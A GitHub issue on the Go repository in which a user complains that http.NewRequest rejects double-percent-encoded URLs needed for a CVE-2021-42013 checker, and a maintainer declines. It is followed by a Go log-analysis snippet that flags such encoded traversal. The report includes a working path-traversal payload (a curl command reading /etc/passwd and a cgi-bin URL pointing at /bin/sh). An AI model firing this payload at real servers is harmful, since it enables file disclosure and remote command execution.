golang / go

The Go programming language
https://go.dev
BSD 3-Clause "New" or "Revised" License

net/http: http.NewRequest is error parse ... invalid URL escape "%%" #64866

Closed hktalent closed 10 months ago

hktalent commented 10 months ago

Go version

go version go1.21.4 darwin/amd64

What operating system and processor architecture are you using (go env)?

GO111MODULE='on'
GOARCH='amd64'
GOBIN=''
GOCACHE='/Users/51pwn/Library/Caches/go-build'
GOENV='/Users/51pwn/Library/Application Support/go/env'
GOEXE=''
GOEXPERIMENT=''
GOFLAGS=''
GOHOSTARCH='amd64'
GOHOSTOS='darwin'
GOINSECURE=''
GOMODCACHE='/Users/51pwn/go/pkg/mod'
GONOPROXY='github.com/hktalent/zbServer'
GONOSUMDB='github.com/hktalent/zbServer'
GOOS='darwin'
GOPATH='/Users/51pwn/go'
GOPRIVATE='github.com/hktalent/zbServer'
GOPROXY='https://mirrors.aliyun.com/goproxy/,direct'
GOROOT='/usr/local/go/'
GOSUMDB='sum.golang.org'
GOTMPDIR=''
GOTOOLCHAIN='auto'
GOTOOLDIR='/usr/local/go/pkg/tool/darwin_amd64'
GOVCS=''
GOVERSION='go1.21.4'
GCCGO='gccgo'
GOAMD64='v1'
AR='ar'
CC='clang'
CXX='clang++'
CGO_ENABLED='1'
GOMOD='/dev/null'
GOWORK=''
CGO_CFLAGS='-O2 -g'
CGO_CPPFLAGS=''
CGO_CXXFLAGS='-O2 -g'
CGO_FFLAGS='-O2 -g'
CGO_LDFLAGS='-O2 -g'
PKG_CONFIG='pkg-config'
GOGCCFLAGS='-fPIC -arch x86_64 -m64 -pthread -fno-caret-diagnostics -Qunused-arguments -fmessage-length=0 -ffile-prefix-map=/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/go-build3521013577=/tmp/go-build -gno-record-gcc-switches -fno-common'

What did you do?

I'm writing a verification program for this security vulnerability: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-42013. I tried to do it with golang. But curl is able to send packets like this correctly:

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

But it doesn’t work in golang. An error like this occurred.

http.NewRequest is error parse "https://api.xxx.com/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh": invalid URL escape "%%3"

I think that the task of parsing should be done by the server. Here the client only needs to send the data to the server.

Thank you very much for fixing this bug

What did you expect to see?

http.NewRequest is error parse "https://api.xxx.com/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh": invalid URL escape "%%3"

What did you see instead?

curl is ok

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

seankhliao commented 10 months ago

Our policy is that the client should only send valid data; use cases such as security scanners are considered out of scope.
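
The strict percent-escape check that produced the error in this report can also be applied on the receiving side, to flag request targets in access logs that a conforming client would never send. The following is an added example, not code from this issue or from the Go project; `checkTarget`, `hasDotDot`, the verdict strings and the sample targets are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// checkTarget classifies the path of a raw request target the way Go's
// strict percent-decoder sees it, returning a verdict and a detail string.
func checkTarget(target string) (verdict, detail string) {
	path, _, _ := strings.Cut(target, "?") // the query string is not examined
	decoded, err := url.PathUnescape(path)
	var esc url.EscapeError
	if errors.As(err, &esc) {
		// Same condition http.NewRequest reported: invalid URL escape "%%3".
		return "malformed-escape", string(esc)
	}
	if err != nil {
		return "error", err.Error()
	}
	if hasDotDot(decoded) {
		if hasDotDot(path) {
			return "dot-segment", decoded
		}
		// ".." only appears after decoding, so it was percent-encoded.
		return "encoded-dot-segment", decoded
	}
	return "ok", decoded
}

// hasDotDot reports whether any "/"-separated segment of p is exactly "..".
func hasDotDot(p string) bool {
	for _, seg := range strings.Split(p, "/") {
		if seg == ".." {
			return true
		}
	}
	return false
}

func main() {
	// Constructed sample targets; the first reuses the escape pattern from the report.
	for _, t := range []string{"/icons/.%%32%65/.%%32%65/etc/passwd",
		"/icons/%2e%2e/readme", "/static/logo%20small.png?x=1", "/a/100%"} {
		v, d := checkTarget(t)
		fmt.Printf("%-20s %-26q %s\n", v, d, t)
	}
}
```
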